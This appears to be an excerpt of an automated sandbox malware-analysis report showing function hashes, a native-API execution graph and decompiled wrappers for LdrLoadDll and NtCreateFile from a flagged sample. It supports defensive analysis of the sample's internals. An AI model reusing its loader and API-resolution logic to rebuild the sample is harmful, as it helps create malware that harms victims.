                                                                              • Instruction ID: 34c5074bca30502cb6e9b78d0551525777a2982ab6ff123f8c2434920c08ad18
                                                                              • Opcode Fuzzy Hash: 4d0b66a3dc51ee65ed70c9142d359738ce8eba2b46ffac1bf0e75e78187df71a
                                                                              • Instruction Fuzzy Hash: 0D41C171E01618DBEB58CFAAD8447AEFAF3EF89300F04D0BA9908A7255DB3509858F50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C774D Relevance: .2, Instructions: 192COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0f6777525002b684fed845ee5dee7e5266a88ca83c766d89a7a2859e97967f57
                                                                              • Instruction ID: e020b10fa5f99ecab84c46f02192dd70e320444214e0c358ff4313e1d6207f49
                                                                              • Opcode Fuzzy Hash: 0f6777525002b684fed845ee5dee7e5266a88ca83c766d89a7a2859e97967f57
                                                                              • Instruction Fuzzy Hash: D2517E717002069FD708EE69EC95ABFB7B6EBD4B00B00882DDA05DB255EF709D0587A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C7960 Relevance: .2, Instructions: 175COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 80a01277086a21fec1605d6b9e7ee3880b80de647fc4b2c94abf1a2da3cb9e00
                                                                              • Instruction ID: d4ebc2d88b3d19384863ba11c8eea1004aca5a200d0030c5ab39f6f2223f32c9
                                                                              • Opcode Fuzzy Hash: 80a01277086a21fec1605d6b9e7ee3880b80de647fc4b2c94abf1a2da3cb9e00
                                                                              • Instruction Fuzzy Hash: 4E516B717001069FD708EE69EC949BFB7A7FBC4B00B00882D9A069B256EF719D0697A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:4.2%
                                                                              Dynamic/Decrypted Code Coverage:2.5%
                                                                              Signature Coverage:4.6%
                                                                              Total number of Nodes:636
                                                                              Total number of Limit Nodes:68
                                                                              execution_graph 30465 420093 30468 41e763 30465->30468 30473 41f1a3 30468->30473 30470 41e77f 30477 17a9a00 LdrInitializeThunk 30470->30477 30471 41e79a 30474 41f228 30473->30474 30476 41f1b2 30473->30476 30474->30470 30476->30474 30478 419533 30476->30478 30477->30471 30479 419541 30478->30479 30480 41954d 30478->30480 30479->30480 30483 4199b3 LdrLoadDll 30479->30483 30480->30474 30482 41969f 30482->30474 30483->30482 30484 40b493 30485 40b4b8 30484->30485 30490 40cec3 30485->30490 30489 40b50a 30491 40cee7 30490->30491 30492 40cf23 LdrLoadDll 30491->30492 30493 40b4eb 30491->30493 30492->30493 30493->30489 30494 40ea83 30493->30494 30495 40eaaf 30494->30495 30505 41e3c3 30495->30505 30498 40eacf 30498->30489 30502 40eb0a 30514 41e673 30502->30514 30504 40eb2d 30504->30489 30506 41f1a3 LdrLoadDll 30505->30506 30507 40eac8 30506->30507 30507->30498 30508 41e403 30507->30508 30509 41f1a3 LdrLoadDll 30508->30509 30510 41e41f 30509->30510 30517 17a9710 LdrInitializeThunk 30510->30517 30511 40eaf2 30511->30498 30513 41e9f3 LdrLoadDll 30511->30513 30513->30502 30515 41f1a3 LdrLoadDll 30514->30515 30516 41e68f NtClose 30515->30516 30516->30504 30517->30511 30518 401726 30519 401747 30518->30519 30522 423313 30519->30522 30525 41fbd3 30522->30525 30526 41fbf9 30525->30526 30539 40be53 30526->30539 30528 41fc05 30529 4017c6 30528->30529 30547 410063 30528->30547 30531 41fc24 30532 41fc37 30531->30532 30559 410023 30531->30559 30535 41fc4c 30532->30535 30568 41e893 30532->30568 30564 4034e3 30535->30564 30537 41fc5b 30538 41e893 2 API calls 30537->30538 30538->30529 30540 40be60 30539->30540 30571 40bda3 30539->30571 30542 40be67 30540->30542 30583 40bd43 30540->30583 30542->30528 30548 41008f 30547->30548 30979 40d393 30548->30979 30550 4100a1 30983 40ff33 30550->30983 30553 4100e5 30553->30531 30554 4100d4 30554->30553 30558 41e673 2 API calls 30554->30558 30555 4100bc 30556 4100c7 30555->30556 30557 41e673 2 API calls 30555->30557 30556->30531 30557->30556 30558->30553 30560 419533 LdrLoadDll 30559->30560 30561 410042 30560->30561 30562 410049 30561->30562 30563 41004b GetUserGeoID 30561->30563 30562->30532 30563->30532 30565 40353a 30564->30565 30567 403547 30565->30567 31002 40dd23 30565->31002 30567->30537 30569 41f1a3 LdrLoadDll 30568->30569 30570 41e8b2 ExitProcess 30569->30570 30570->30535 30572 40bdb6 30571->30572 30622 41cdf3 LdrLoadDll 30571->30622 30602 41ccb3 30572->30602 30575 40bdc9 30575->30540 30576 40bdbf 30576->30575 30605 41f523 30576->30605 30578 40be06 30578->30575 30616 40bbe3 30578->30616 30580 40be26 30623 40b643 LdrLoadDll 30580->30623 30582 40be38 30582->30540 30961 41f813 30583->30961 30586 41f813 LdrLoadDll 30587 40bd74 30586->30587 30588 41f813 LdrLoadDll 30587->30588 30589 40bd8d 30588->30589 30590 40fe23 30589->30590 30591 40fe3c 30590->30591 30965 40d213 30591->30965 30593 40fe4f 30594 41e3c3 LdrLoadDll 30593->30594 30595 40fe5e 30594->30595 30596 40be78 30595->30596 30969 41e9b3 30595->30969 30596->30528 30598 40fe75 30599 40fea0 30598->30599 30972 41e443 30598->30972 30601 41e673 2 API calls 30599->30601 30601->30596 30624 41e7e3 30602->30624 30606 41f53c 30605->30606 30627 419123 30606->30627 30608 41f554 30609 41f55d 30608->30609 30666 41f363 30608->30666 30609->30578 30611 41f571 30611->30609 30683 41e0e3 30611->30683 30613 41f5a5 30688 4200d3 30613->30688 30619 40bbfd 30616->30619 30939 4093e3 30616->30939 30618 40bc04 30618->30580 30619->30618 30952 4096a3 30619->30952 30622->30572 30623->30582 30625 41f1a3 LdrLoadDll 30624->30625 30626 41ccc8 30625->30626 30626->30576 30628 419466 30627->30628 30638 419137 30627->30638 30628->30608 30631 419268 30694 41e543 30631->30694 30632 41924b 30751 41e643 LdrLoadDll 30632->30751 30635 419255 30635->30608 30636 41928f 30637 4200d3 2 API calls 30636->30637 30641 41929b 30637->30641 30638->30628 30691 41de33 30638->30691 30639 41942a 30642 41e673 2 API calls 30639->30642 30640 419440 30757 418e53 LdrLoadDll NtReadFile NtClose 30640->30757 30641->30635 30641->30639 30641->30640 30646 419333 30641->30646 30644 419431 30642->30644 30644->30608 30645 419453 30645->30608 30647 41939a 30646->30647 30649 419342 30646->30649 30647->30639 30648 4193ad 30647->30648 30753 41e4c3 30648->30753 30651 419347 30649->30651 30652 41935b 30649->30652 30752 418d13 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 30651->30752 30655 419360 30652->30655 30656 419378 30652->30656 30697 418db3 30655->30697 30656->30644 30709 418ad3 30656->30709 30658 419351 30658->30608 30661 41940d 30664 41e673 2 API calls 30661->30664 30662 41936e 30662->30608 30663 419390 30663->30608 30665 419419 30664->30665 30665->30608 30667 41f37e 30666->30667 30668 41f390 30667->30668 30775 420053 30667->30775 30668->30611 30670 41f3b0 30778 418733 30670->30778 30672 41f3d3 30672->30668 30673 418733 3 API calls 30672->30673 30674 41f3f5 30673->30674 30674->30668 30810 419a83 30674->30810 30676 41f47d 30677 41f48d 30676->30677 30905 41f123 LdrLoadDll 30676->30905 30821 41ef93 30677->30821 30680 41f4bb 30900 41e0a3 30680->30900 30682 41f4e5 30682->30611 30684 41f1a3 LdrLoadDll 30683->30684 30685 41e0ff 30684->30685 30933 17a967a 30685->30933 30686 41e11a 30686->30613 30936 41e853 30688->30936 30690 41f5cf 30690->30578 30692 41f1a3 LdrLoadDll 30691->30692 30693 41921c 30692->30693 30693->30631 30693->30632 30693->30635 30695 41f1a3 LdrLoadDll 30694->30695 30696 41e55f NtCreateFile 30695->30696 30696->30636 30698 418dcf 30697->30698 30699 41e4c3 LdrLoadDll 30698->30699 30700 418df0 30699->30700 30701 418df7 30700->30701 30702 418e0b 30700->30702 30703 41e673 2 API calls 30701->30703 30704 41e673 2 API calls 30702->30704 30705 418e00 30703->30705 30706 418e14 30704->30706 30705->30662 30758 4201f3 LdrLoadDll RtlAllocateHeap 30706->30758 30708 418e1f 30708->30662 30710 418b51 30709->30710 30711 418b1e 30709->30711 30713 418c99 30710->30713 30717 418b6d 30710->30717 30712 41e4c3 LdrLoadDll 30711->30712 30714 418b39 30712->30714 30715 41e4c3 LdrLoadDll 30713->30715 30716 41e673 2 API calls 30714->30716 30720 418cb4 30715->30720 30719 418b42 30716->30719 30718 41e4c3 LdrLoadDll 30717->30718 30721 418b88 30718->30721 30719->30663 30771 41e503 LdrLoadDll 30720->30771 30723 418ba4 30721->30723 30724 418b8f 30721->30724 30727 418ba9 30723->30727 30728 418bbf 30723->30728 30726 41e673 2 API calls 30724->30726 30725 418cee 30729 41e673 2 API calls 30725->30729 30730 418b98 30726->30730 30731 41e673 2 API calls 30727->30731 30736 418bc4 30728->30736 30759 4201b3 30728->30759 30732 418cf9 30729->30732 30730->30663 30733 418bb2 30731->30733 30732->30663 30733->30663 30745 418bd3 30736->30745 30762 41e5f3 30736->30762 30737 418c27 30738 418c3e 30737->30738 30770 41e483 LdrLoadDll 30737->30770 30740 418c45 30738->30740 30741 418c5a 30738->30741 30742 41e673 2 API calls 30740->30742 30743 41e673 2 API calls 30741->30743 30742->30745 30744 418c63 30743->30744 30746 418c8f 30744->30746 30765 41fed3 30744->30765 30745->30663 30746->30663 30748 418c7a 30749 4200d3 2 API calls 30748->30749 30750 418c83 30749->30750 30750->30663 30751->30635 30752->30658 30754 41f1a3 LdrLoadDll 30753->30754 30755 4193f5 30754->30755 30756 41e503 LdrLoadDll 30755->30756 30756->30661 30757->30645 30758->30708 30772 41e813 30759->30772 30761 4201cb 30761->30736 30763 41f1a3 LdrLoadDll 30762->30763 30764 41e60f NtReadFile 30763->30764 30764->30737 30766 41fee0 30765->30766 30767 41fef7 30765->30767 30766->30767 30768 4201b3 2 API calls 30766->30768 30767->30748 30769 41ff0e 30768->30769 30769->30748 30770->30738 30771->30725 30773 41f1a3 LdrLoadDll 30772->30773 30774 41e82f RtlAllocateHeap 30773->30774 30774->30761 30906 41e723 30775->30906 30777 420080 30777->30670 30779 418744 30778->30779 30781 41874c 30778->30781 30779->30672 30780 418a1f 30780->30672 30781->30780 30909 421253 30781->30909 30783 4187a0 30784 421253 2 API calls 30783->30784 30787 4187ab 30784->30787 30785 4187f9 30788 421253 2 API calls 30785->30788 30787->30785 30789 421383 3 API calls 30787->30789 30920 4212f3 LdrLoadDll RtlAllocateHeap RtlFreeHeap 30787->30920 30791 41880d 30788->30791 30789->30787 30790 41886a 30792 421253 2 API calls 30790->30792 30791->30790 30914 421383 30791->30914 30794 418880 30792->30794 30795 4188bd 30794->30795 30797 421383 3 API calls 30794->30797 30796 421253 2 API calls 30795->30796 30798 4188c8 30796->30798 30797->30794 30799 421383 3 API calls 30798->30799 30806 418902 30798->30806 30799->30798 30801 4189f7 30922 4212b3 LdrLoadDll RtlFreeHeap 30801->30922 30803 418a01 30923 4212b3 LdrLoadDll RtlFreeHeap 30803->30923 30805 418a0b 30924 4212b3 LdrLoadDll RtlFreeHeap 30805->30924 30921 4212b3 LdrLoadDll RtlFreeHeap 30806->30921 30808 418a15 30925 4212b3 LdrLoadDll RtlFreeHeap 30808->30925 30811 419a94 30810->30811 30812 419123 8 API calls 30811->30812 30817 419aaa 30812->30817 30813 419ab3 30813->30676 30814 419aea 30815 4200d3 2 API calls 30814->30815 30816 419afb 30815->30816 30816->30676 30817->30813 30817->30814 30818 419b36 30817->30818 30819 4200d3 2 API calls 30818->30819 30820 419b3b 30819->30820 30820->30676 30926 41ee23 30821->30926 30823 41efa7 30824 41ee23 LdrLoadDll 30823->30824 30825 41efb0 30824->30825 30826 41ee23 LdrLoadDll 30825->30826 30827 41efb9 30826->30827 30828 41ee23 LdrLoadDll 30827->30828 30829 41efc2 30828->30829 30830 41ee23 LdrLoadDll 30829->30830 30831 41efcb 30830->30831 30832 41ee23 LdrLoadDll 30831->30832 30833 41efd4 30832->30833 30834 41ee23 LdrLoadDll 30833->30834 30835 41efe0 30834->30835 30836 41ee23 LdrLoadDll 30835->30836 30837 41efe9 30836->30837 30838 41ee23 LdrLoadDll 30837->30838 30839 41eff2 30838->30839 30840 41ee23 LdrLoadDll 30839->30840 30841 41effb 30840->30841 30842 41ee23 LdrLoadDll 30841->30842 30843 41f004 30842->30843 30844 41ee23 LdrLoadDll 30843->30844 30845 41f00d 30844->30845 30846 41ee23 LdrLoadDll 30845->30846 30847 41f019 30846->30847 30848 41ee23 LdrLoadDll 30847->30848 30849 41f022 30848->30849 30850 41ee23 LdrLoadDll 30849->30850 30851 41f02b 30850->30851 30852 41ee23 LdrLoadDll 30851->30852 30853 41f034 30852->30853 30854 41ee23 LdrLoadDll 30853->30854 30855 41f03d 30854->30855 30856 41ee23 LdrLoadDll 30855->30856 30857 41f046 30856->30857 30858 41ee23 LdrLoadDll 30857->30858 30859 41f052 30858->30859 30860 41ee23 LdrLoadDll 30859->30860 30861 41f05b 30860->30861 30862 41ee23 LdrLoadDll 30861->30862 30863 41f064 30862->30863 30864 41ee23 LdrLoadDll 30863->30864 30865 41f06d 30864->30865 30866 41ee23 LdrLoadDll 30865->30866 30867 41f076 30866->30867 30868 41ee23 LdrLoadDll 30867->30868 30869 41f07f 30868->30869 30870 41ee23 LdrLoadDll 30869->30870 30871 41f08b 30870->30871 30872 41ee23 LdrLoadDll 30871->30872 30873 41f094 30872->30873 30874 41ee23 LdrLoadDll 30873->30874 30875 41f09d 30874->30875 30876 41ee23 LdrLoadDll 30875->30876 30877 41f0a6 30876->30877 30878 41ee23 LdrLoadDll 30877->30878 30879 41f0af 30878->30879 30880 41ee23 LdrLoadDll 30879->30880 30881 41f0b8 30880->30881 30882 41ee23 LdrLoadDll 30881->30882 30883 41f0c4 30882->30883 30884 41ee23 LdrLoadDll 30883->30884 30885 41f0cd 30884->30885 30886 41ee23 LdrLoadDll 30885->30886 30887 41f0d6 30886->30887 30888 41ee23 LdrLoadDll 30887->30888 30889 41f0df 30888->30889 30890 41ee23 LdrLoadDll 30889->30890 30891 41f0e8 30890->30891 30892 41ee23 LdrLoadDll 30891->30892 30893 41f0f1 30892->30893 30894 41ee23 LdrLoadDll 30893->30894 30895 41f0fd 30894->30895 30896 41ee23 LdrLoadDll 30895->30896 30897 41f106 30896->30897 30898 41ee23 LdrLoadDll 30897->30898 30899 41f10f 30898->30899 30899->30680 30901 41f1a3 LdrLoadDll 30900->30901 30902 41e0bf 30901->30902 30932 17a9860 LdrInitializeThunk 30902->30932 30903 41e0d6 30903->30682 30905->30677 30907 41f1a3 LdrLoadDll 30906->30907 30908 41e73f NtAllocateVirtualMemory 30907->30908 30908->30777 30910 421263 30909->30910 30911 421269 30909->30911 30910->30783 30912 4201b3 2 API calls 30911->30912 30913 42128f 30912->30913 30913->30783 30915 4212f3 30914->30915 30916 4201b3 2 API calls 30915->30916 30919 421350 30915->30919 30917 42132d 30916->30917 30918 4200d3 2 API calls 30917->30918 30918->30919 30919->30791 30920->30787 30921->30801 30922->30803 30923->30805 30924->30808 30925->30780 30927 41ee3e 30926->30927 30928 419533 LdrLoadDll 30927->30928 30929 41ee5e 30928->30929 30930 419533 LdrLoadDll 30929->30930 30931 41ef12 30929->30931 30930->30931 30931->30823 30931->30931 30932->30903 30934 17a968f LdrInitializeThunk 30933->30934 30935 17a9681 30933->30935 30934->30686 30935->30686 30937 41f1a3 LdrLoadDll 30936->30937 30938 41e86f RtlFreeHeap 30937->30938 30938->30690 30940 4093f3 30939->30940 30941 4093ee 30939->30941 30942 420053 2 API calls 30940->30942 30941->30619 30945 409418 30942->30945 30943 40947b 30943->30619 30944 41e0a3 2 API calls 30944->30945 30945->30943 30945->30944 30947 409481 30945->30947 30950 420053 2 API calls 30945->30950 30955 41e7a3 30945->30955 30948 4094a7 30947->30948 30949 41e7a3 2 API calls 30947->30949 30948->30619 30951 409498 30949->30951 30950->30945 30951->30619 30953 41e7a3 2 API calls 30952->30953 30954 4096c1 30953->30954 30954->30580 30956 41f1a3 LdrLoadDll 30955->30956 30957 41e7bf 30956->30957 30960 17a96e0 LdrInitializeThunk 30957->30960 30958 41e7d6 30958->30945 30960->30958 30962 41f836 30961->30962 30963 40cec3 LdrLoadDll 30962->30963 30964 40bd60 30963->30964 30964->30586 30966 40d236 30965->30966 30968 40d2b3 30966->30968 30977 41de73 LdrLoadDll 30966->30977 30968->30593 30970 41f1a3 LdrLoadDll 30969->30970 30971 41e9cf LookupPrivilegeValueW 30970->30971 30971->30598 30973 41f1a3 LdrLoadDll 30972->30973 30974 41e45f 30973->30974 30978 17a9910 LdrInitializeThunk 30974->30978 30975 41e47e 30975->30599 30977->30968 30978->30975 30980 40d3ba 30979->30980 30981 40d213 LdrLoadDll 30980->30981 30982 40d41d 30981->30982 30982->30550 30984 40ff4d 30983->30984 30992 410003 30983->30992 30985 40d213 LdrLoadDll 30984->30985 30986 40ff6f 30985->30986 30993 41e123 30986->30993 30988 40ffb1 30996 41e163 30988->30996 30991 41e673 2 API calls 30991->30992 30992->30554 30992->30555 30994 41f1a3 LdrLoadDll 30993->30994 30995 41e13f 30994->30995 30995->30988 30997 41f1a3 LdrLoadDll 30996->30997 30998 41e17f 30997->30998 31001 17a9fe0 LdrInitializeThunk 30998->31001 30999 40fff7 30999->30991 31001->30999 31003 40dd4e 31002->31003 31004 40d393 LdrLoadDll 31003->31004 31005 40dda5 31004->31005 31038 40d013 31005->31038 31007 40ddcb 31037 40e01c 31007->31037 31047 418a63 31007->31047 31009 40de10 31009->31037 31050 40a013 31009->31050 31011 40de54 31011->31037 31072 41e6e3 31011->31072 31015 40deaa 31016 40deb1 31015->31016 31084 41e1f3 31015->31084 31017 4200d3 2 API calls 31016->31017 31019 40debe 31017->31019 31019->30567 31021 40defb 31022 4200d3 2 API calls 31021->31022 31023 40df02 31022->31023 31023->30567 31024 40df0b 31025 4100f3 3 API calls 31024->31025 31026 40df7f 31025->31026 31026->31016 31027 40df8a 31026->31027 31028 4200d3 2 API calls 31027->31028 31029 40dfae 31028->31029 31089 41e243 31029->31089 31032 41e1f3 2 API calls 31033 40dfe9 31032->31033 31033->31037 31094 41e003 31033->31094 31036 41e893 2 API calls 31036->31037 31037->30567 31039 40d020 31038->31039 31040 40d024 31038->31040 31039->31007 31041 40d03d 31040->31041 31042 40d06f 31040->31042 31099 41deb3 LdrLoadDll 31041->31099 31100 41deb3 LdrLoadDll 31042->31100 31044 40d080 31044->31007 31046 40d05f 31046->31007 31048 4100f3 3 API calls 31047->31048 31049 418a89 31047->31049 31048->31049 31049->31009 31101 40a243 31050->31101 31052 40a031 31053 4093e3 4 API calls 31052->31053 31054 40a10f 31052->31054 31056 40a239 31052->31056 31063 40a06f 31053->31063 31055 40a1ef 31054->31055 31054->31056 31057 4093e3 4 API calls 31054->31057 31055->31056 31148 410363 10 API calls 31055->31148 31056->31011 31069 40a14c 31057->31069 31059 40a203 31059->31056 31149 410363 10 API calls 31059->31149 31061 40a219 31061->31056 31150 410363 10 API calls 31061->31150 31063->31054 31066 40a105 31063->31066 31115 409cf3 31063->31115 31064 40a22f 31064->31011 31068 4096a3 2 API calls 31066->31068 31067 409cf3 14 API calls 31067->31069 31068->31054 31069->31055 31069->31067 31070 40a1e5 31069->31070 31071 4096a3 2 API calls 31070->31071 31071->31055 31073 41f1a3 LdrLoadDll 31072->31073 31074 41e6ff 31073->31074 31232 17a98f0 LdrInitializeThunk 31074->31232 31075 40de8b 31077 4100f3 31075->31077 31078 410110 31077->31078 31233 41e1a3 31078->31233 31081 410158 31081->31015 31082 41e1f3 2 API calls 31083 410181 31082->31083 31083->31015 31085 41f1a3 LdrLoadDll 31084->31085 31086 41e20f 31085->31086 31239 17a9780 LdrInitializeThunk 31086->31239 31087 40deee 31087->31021 31087->31024 31090 41f1a3 LdrLoadDll 31089->31090 31091 41e25f 31090->31091 31240 17a97a0 LdrInitializeThunk 31091->31240 31092 40dfc2 31092->31032 31095 41f1a3 LdrLoadDll 31094->31095 31096 41e01f 31095->31096 31241 17a9a20 LdrInitializeThunk 31096->31241 31097 40e015 31097->31036 31099->31046 31100->31044 31102 40a26a 31101->31102 31103 4093e3 4 API calls 31102->31103 31110 40a4c2 31102->31110 31104 40a2bd 31103->31104 31105 4096a3 2 API calls 31104->31105 31104->31110 31106 40a34c 31105->31106 31107 4093e3 4 API calls 31106->31107 31106->31110 31108 40a361 31107->31108 31109 4096a3 2 API calls 31108->31109 31108->31110 31113 40a3c1 31109->31113 31110->31052 31111 4093e3 4 API calls 31111->31113 31112 409cf3 14 API calls 31112->31113 31113->31110 31113->31111 31113->31112 31114 4096a3 2 API calls 31113->31114 31114->31113 31116 409d18 31115->31116 31151 41def3 31116->31151 31119 409d6c 31119->31063 31120 409ded 31184 410243 LdrLoadDll NtClose 31120->31184 31121 41e0e3 2 API calls 31122 409d90 31121->31122 31122->31120 31124 409d9b 31122->31124 31126 409e19 31124->31126 31154 40e033 31124->31154 31125 409e08 31127 409e25 31125->31127 31128 409e0f 31125->31128 31126->31063 31185 41df73 LdrLoadDll 31127->31185 31131 41e673 2 API calls 31128->31131 31130 409db5 31130->31126 31174 409b23 31130->31174 31131->31126 31133 409e50 31135 40e033 5 API calls 31133->31135 31137 409e70 31135->31137 31137->31126 31186 41dfa3 LdrLoadDll 31137->31186 31139 409e95 31187 41e033 LdrLoadDll 31139->31187 31141 409eaf 31142 41e003 2 API calls 31141->31142 31143 409ebe 31142->31143 31144 41e673 2 API calls 31143->31144 31145 409ec8 31144->31145 31188 4098f3 31145->31188 31147 409edc 31147->31063 31148->31059 31149->31061 31150->31064 31152 41f1a3 LdrLoadDll 31151->31152 31153 409d62 31152->31153 31153->31119 31153->31120 31153->31121 31155 40e061 31154->31155 31156 4100f3 3 API calls 31155->31156 31157 40e0c0 31156->31157 31158 40e109 31157->31158 31159 41e1f3 2 API calls 31157->31159 31158->31130 31160 40e0eb 31159->31160 31161 40e0f5 31160->31161 31165 40e115 31160->31165 31162 41e243 2 API calls 31161->31162 31163 40e0ff 31162->31163 31164 41e673 2 API calls 31163->31164 31164->31158 31166 40e182 31165->31166 31167 40e19f 31165->31167 31169 41e673 2 API calls 31166->31169 31168 41e243 2 API calls 31167->31168 31170 40e1ae 31168->31170 31171 40e18c 31169->31171 31172 41e673 2 API calls 31170->31172 31171->31130 31173 40e1b8 31172->31173 31173->31130 31176 409b33 31174->31176 31175 409cc4 31175->31063 31176->31175 31204 4096e3 31176->31204 31178 409c38 31178->31175 31179 4098f3 11 API calls 31178->31179 31180 409c66 31179->31180 31180->31175 31181 41e0e3 2 API calls 31180->31181 31182 409c9b 31181->31182 31182->31175 31183 41e6e3 2 API calls 31182->31183 31183->31175 31184->31125 31185->31133 31186->31139 31187->31141 31189 40991c 31188->31189 31211 409853 31189->31211 31192 41e6e3 2 API calls 31194 40992f 31192->31194 31193 4099ba 31193->31147 31194->31192 31194->31193 31197 4099b5 31194->31197 31219 4102c3 31194->31219 31195 41e673 2 API calls 31196 4099ed 31195->31196 31196->31193 31198 41def3 LdrLoadDll 31196->31198 31197->31195 31199 409a52 31198->31199 31199->31193 31223 41df33 31199->31223 31201 409ab6 31201->31193 31202 419123 8 API calls 31201->31202 31203 409b0b 31202->31203 31203->31147 31205 4097e2 31204->31205 31206 4096f8 31204->31206 31205->31178 31206->31205 31207 419123 8 API calls 31206->31207 31208 409765 31207->31208 31209 4200d3 2 API calls 31208->31209 31210 40978c 31208->31210 31209->31210 31210->31178 31212 40986d 31211->31212 31213 40cec3 LdrLoadDll 31212->31213 31214 409888 31213->31214 31215 419533 LdrLoadDll 31214->31215 31216 4098a0 31215->31216 31217 4098a9 PostThreadMessageW 31216->31217 31218 4098bc 31216->31218 31217->31218 31218->31194 31220 4102d6 31219->31220 31226 41e073 31220->31226 31224 41f1a3 LdrLoadDll 31223->31224 31225 41df4f 31224->31225 31225->31201 31227 41f1a3 LdrLoadDll 31226->31227 31228 41e08f 31227->31228 31231 17a9840 LdrInitializeThunk 31228->31231 31229 410301 31229->31194 31231->31229 31232->31075 31234 41f1a3 LdrLoadDll 31233->31234 31235 41e1bf 31234->31235 31238 17a99a0 LdrInitializeThunk 31235->31238 31236 410151 31236->31081 31236->31082 31238->31236 31239->31087 31240->31092 31241->31097 31244 17a9540 LdrInitializeThunk

                                                                              Executed Functions

                                                                              Function 0040CEC3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 289 40cec3-40ceec call 420e73 292 40cef2-40cf00 call 421393 289->292 293 40ceee-40cef1 289->293 296 40cf10-40cf21 call 41f713 292->296 297 40cf02-40cf0d call 421613 292->297 302 40cf23-40cf37 LdrLoadDll 296->302 303 40cf3a-40cf3d 296->303 297->296 302->303
                                                                              C-Code - Quality: 100%
                                                                              			E0040CEC3(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420E73( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E00421393(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00421613( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F713(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                              0x0040cedf
                                                                              0x0040cee2
                                                                              0x0040cee7
                                                                              0x0040ceec
                                                                              0x0040cef6
                                                                              0x0040cefb
                                                                              0x0040cefe
                                                                              0x0040cf00
                                                                              0x0040cf08
                                                                              0x0040cf0d
                                                                              0x0040cf0d
                                                                              0x0040cf14
                                                                              0x0040cf1c
                                                                              0x0040cf1f
                                                                              0x0040cf21
                                                                              0x0040cf35
                                                                              0x00000000
                                                                              0x0040cf37
                                                                              0x0040cf3d
                                                                              0x0040cef1
                                                                              0x0040cef1
                                                                              0x0040cef1

                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF35
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_400000_SC_0017384.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: 465e602d4e5448e61c61a74e0a69245d4ee7db4df5cef81cff7209f5ddb63eac
                                                                              • Instruction ID: 975621d9eb19e73481e1729088ecbb3c96e5b4e3a6285320f5c6e07950aec1f8
                                                                              • Opcode Fuzzy Hash: 465e602d4e5448e61c61a74e0a69245d4ee7db4df5cef81cff7209f5ddb63eac
                                                                              • Instruction Fuzzy Hash: 2C0112B5E4010DB7DF10DBE5DC82F9EB3789B54308F0441A6E908A7281F635EB598795
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041E543 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 304 41e543-41e594 call 41f1a3 NtCreateFile
                                                                              C-Code - Quality: 100%
                                                                              			E0041E543(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F1A3( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                              0x0041e552
                                                                              0x0041e55a
                                                                              0x0041e590
                                                                              0x0041e594

                                                                              APIs
                                                                              • NtCreateFile.NTDLL(00000060,63CD32E9,00004C56,0041928F,63CD32E9,FFFFFFFF,?,?,FFFFFFFF,63CD32E9,0041928F,00004C56,63CD32E9,00000060,00000000,00000000), ref: 0041E590
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_400000_SC_0017384.jbxd
                                                                              Yara matches
                                                                              Similarity
